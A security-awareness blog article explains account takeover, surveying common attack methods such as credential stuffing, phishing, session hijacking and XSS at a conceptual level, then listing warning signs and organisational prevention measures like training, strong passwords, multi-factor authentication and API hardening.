What is Account Takeover: Prevention and Protection Strategies


A post by Pieter Arntz in the Malwarebytes blog back in August 2023 describes a sad case where attackers steal Linkedin accounts then demand ransom.

Pieter followed this post with another post in September 2023, where he gave what he describes as a «firsthand perspective on the recent LinkedIn account takeover». In this post, he narrated the experience of a  co-worker named Pearce who had been targeted by the campaign.

This is a frightening experience. But it gets more frightening when you discover that account takeover is not only limited to LinkedIn or social media accounts. The attackers can also target the work accounts of employees across organizations, and this can mean disaster for your business.

Indeed, account takeover has been skyrocketing year-over-year since the advent of Covid-19. There was a 169% increase in account takeover cases between 2021 and 2022 and a 354% rise between 2022 and 2023.

Such an alarming increase stems from the soaring adoption of online transactions as part of ongoing digitization. As organizations embrace digitization, fraudsters are watching to identify and exploit loopholes to their advantage.

One of the trends leading to numerous companies falling victim to account takeovers is the prioritization of system implementation over security. In the pursuit of the many advantages that technology brings, many are rushing the development and adoption of systems. In the midst of this, they often neglect or forget to test the security of user accounts.

Unfortunately, cyber attackers never let such neglect go unnoticed, and the victims only realize it after losses averaging $12,000 per victim.

The Digital Trust & Safety Index by Sift reveals that fraudsters target digital service subscriptions (36%), online shopping (31%), and Bank and credit card (29%).

Make no mistake. Any organization can fall prey since subscription-based models are shaping the future of ecommerce.

So, how secure is your organization against account takeover? This article delves into this threat. 

What does account takeover mean?

Account takeover is an identity theft that involves a fraudster accessing a user account against the user’s consent, with ill intent.

Once logged in, the fraudster can conduct malicious activities on the account. These activities could include changing the identification details, scamming users associated with the account and financial drain.

There are two main types of account takeover:

  1. Corporate Account Takeover (CATO)
  2. Personal account takeover.

Corporate Account Takeover is also known as Business Account Takeover. It involves attackers gaining access to an organization’s account, intending to carry out malicious activities.

Personal account takeover is the most prevalent and involves attackers gaining unauthorized access to a user account rather than an organization’s.

How does an account takeover happen?

Attackers use several ways to take over accounts, whether at business or individual level, with the following five strategies being the most prominent.

1. Brute-force attack and credential stuffing

A brute-force attack involves a hacker guessing a combination of characters in an attempt to gain unauthorized access to an account. The attacker employs trial and error in the hope that they will eventually get the login credentials correct.

Credential stuffing, on the other hand, involves an attacker using credentials obtained during a data breach to gain unauthorized access to a user account. These credentials can be a list of usernames or email addresses against their passwords.

Unlike brute-force, attackers that use credential stuffing have a hint of login details. Even if the credentials were obtained from unrelated incidents, they could employ the patterns in the existing credential pairs.

Weak passwords and passwords with easy-to-guess patterns are easiest to break with brute-force and credential stuffing. Using the same password across multiple accounts renders the user vulnerable.

2. Data and device interception through phishing

As you may know, phishing involves tricking a user into clicking malicious links delivered via email or messages. The emails give the impression that they are coming from trusted sources, as they impersonate trusted organizations and brands.

The attackers attach a sense of urgency, requiring the potential victim to click the link immediately. Once they click the link, they are redirected to a login page that mimics a legitimate website. 

Trying to log in on this page results in the user unwittingly sharing their login details with attackers, who subsequently utilize this information to gain access to their accounts.

They may take control of devices and install malware to extract more personally identifiable data.

3. Social engineering

Social engineering involves attackers exploiting human psychology to trick the target audience into providing sensitive data.

The attackers aim to stir up fear, curiosity or anxiety, convincing victims to take actions that compromise their confidentiality.

Phishing is an example of social engineering. Other forms of social engineering include:

  • Smishing, vishing, and quishing: All three are forms of phishing. Smishing occurs via SMS, vishing occurs via voice calls, and quishing occurs via QR codes.
  • Pretexting: A form of social engineering where an attacker impersonates a coworker, customer service representative or an authority to extract sensitive data.
  • Baiting: The attacker presents malicious links in the form of exciting offers or gifts. Clicking the link may drive the installation of malware in devices or the sharing of sensitive data.
  • Business email compromise (BEC): The attackers use compromised business email to lure employees into sharing sensitive organizational data.
  • CEO fraud: Attackers impersonate top executives, such as CEOs, to trick employees into sharing organizational data.

4. Account login compromise

Have you ever tried to log into your account multiple times unsuccessfully while sure of the login details? Or you were automatically logged out of your account, and suddenly, you cannot log in?

Account login compromise is a form of session fixation attack involving an attacker exploiting a weak «forgot password» flow.

If the application you are trying to log into is vulnerable, the attacker tries to create a «forgot password» session to obtain your login details. So, when you cannot log in, you are forced to reset your password.

While at it, the attacker links the application to their account and sends a fixation script in the form of a confirmation email. 

Once you click the confirmation link, the application links you with the attacker. The attacker impersonates you and can transact throughout the session.

5. Session hijacking

As the name suggests, this happens during a browser session. The attacker exploits the vulnerabilities of a web application, protocol or service.

There are various ways in which attackers can execute session hijacking for an account takeover.

i. Cross-site scripting (XSS)

Applications without effective data cleansing render their users vulnerable to attackers through stolen session cookies. The attackers can create a script (malicious link) and inject it into the websites the user has visited.

Once a user clicks the link, their personally identifiable information is shared with the attacker.

With the emergence of AI chatbots, injection-driven threats are on the rise. Learn more in this article where we discussed chatbot injection

ii. Session side-jacking

Session side-jacking is common to public Wi-Fi users. The attackers spy on a user’s network traffic to identify significant sessions. 

Once the attacker finds a key session, mainly transactional, they steal the session key and take over the browsing session.

iii. Malware injection

There are specific malware programs designed to monitor a user’s network traffic. An attacker installs the program on a user's device as a malicious link.  Once you click the link, your network traffic is automatically shared with the attacker..

iv. Man in the browser attack (MitB)

A MitB allows an attacker to change the configuration of webpage content and manipulate HTTP data connections. They can also steal sensitive information that the user enters into the browser, all without the user noticing.

The attacker essentially injects code into the user’s browser, hijacking the user’s session to carry out malicious activities.

Common indicators of account takeover

One successful account takeover can lead an attacker into multiple accounts, leading to significant losses. So, it’s essential to know how to identify an account takeover in case it happens.

These are the common signs to look out for: 

1. Abrupt changes in account information

Attackers can change a user’s account details, including email address and phone number, when logged in. The sooner one can notice it, the better.

3. Unusual account login failure

Login failure isn’t always a network failure or a downtime. Hence, it’s essential to check with service providers whenever a user complains of unusual login failure.

4. Anomalous activity in a user account

Unusual activities include involuntary transactions, unexpected notifications and changes in account details. For instance, a user may receive a notice that they updated their account information.

Whenever a user complains of these occurrences, assist them to change their passwords, and immediately follow up with your service provider.

5. Unfamiliar login patterns

Unfamiliar login patterns, including log-ins from devices a user does not recognize, places they have not been and at odd hours.

How can your organization prevent account takeover?

The 2020 Global Identity and Fraud Report by Experian revealed that 57% of enterprise organizations suffer high losses associated with account takeover fraud.

So it’s important to stay vigilant and defend all users from account takeover. Exercise the following preventive measures to protect everyone in the organization from falling prey to account takeover.

1. Effective ATO awareness and training

An effective ATO awareness entails ensuring all the organization’s departments understand ATO, its causes, cost and prevention measures.

Social engineering is the most prevalent tactic that attackers use to take over an organization’s accounts. And 73% of data breaches entail a human element.

Create an effective program that educates and trains employees on how to:

  • Take care of the organization’s sensitive information
  • Recognize and report account takeover activities
  • Approach account takeover incidents
  • Effectively manage passwords

Also Read: Benefits of Cybersecurity Awareness Training

2. Encourage the use of strong passwords

Weak passwords are subject to brute-force and credential stuffing attacks. Encourage employees to use strong and unique passwords for organizational and personal accounts. 

A strong and unique password should be between 12 to 14 characters. It should also contain uppercase letters, numbers, lowercase letters, and symbols. It shouldn’t be the name of an organization, place, or person, or words found in the dictionary.

3. Employ multi-factor authentication

Multi-factor authentication means using more layers of security. The most common additional layers that are used to implement this approach include:

  • Security tokens
  • Biometric authentication
  • One-time random passwords. 

When multifactor authentication is employed, attackers find it challenging to break through the multiple layers of security unnoticed.

Please check out our full multi-factor authentication guide

4. Enhance API and application login security

Denial of service, man-in-the-middle attacks, code injections and authentication stealing are the leading causes of account takeover through APIs.

Use these tips to strengthen the security of APIs and application logins:

  • Use API gateways: A tool responsible for user request composition, routing and policy enforcement.
  • Implement rate limiting (maximum number of calls allowed within a particular time interval)
  • Regular auditing and logging: Basically documenting all the activities undertaken by users within the account 
  • Use SSL or TLS encryption for identity verification and secure network connection.
  • Implement a web application firewall to filter incoming traffic
  • Perform regular updates and patching  to apply the latest security updates
  • Implement authorization and authentication to ensure only authorized users access applications
  • Use behavioral analytics to monitor anomalous activities 

For more on threats to APIs,it’s important to get familiar with the most common types of attacks that can be targeted at APIs. We also have another great resource where we explain the best practices for API security

5. Use intelligent threat detection and remediation tools

Attackers keep advancing their tactics, which means that manual methods of identification and mitigation may not stand a chance against sophisticated attackers.

Fortunately you can employ automated account monitoring and remediation tools. These tools can identify, analyze and mitigate cybersecurity threats in real-time while providing insights to secure organizational data.

Some of the monitoring and remediation tools that can do a good job in preventing account takeover include:

To further enhance your cybersecurity posture, understanding the roles of Security Information and Event Management (SIEM) and Security Orchestration, Automation, and Response (SOAR) can be invaluable. For a comprehensive understanding of these technologies, you can read our articles on What is SIEM and What is SOAR. Once you're familiar with these concepts, you may want to explore some of the top tools available in the market. Check out our recommendations in Best SIEM Tools and Best SOAR Tools.

Account takeover is a threat to 1 out of every 4 organizations!

According to a report published in Statista, account takeover affected 25% of organizations in 2022 globally. This translates to one in every four organizations. However, the attacks are escalating each year, with the increasing adoption of online transactions.

This is a scenario that we cannot take lightly in business. Please implement the account takeover prevention best practices in this guide.

For overall tips on guarding against cyber threats in general, please check these key steps for cybersecurity remediation.

No comments yet. Be the first to add a comment!
Our site uses cookies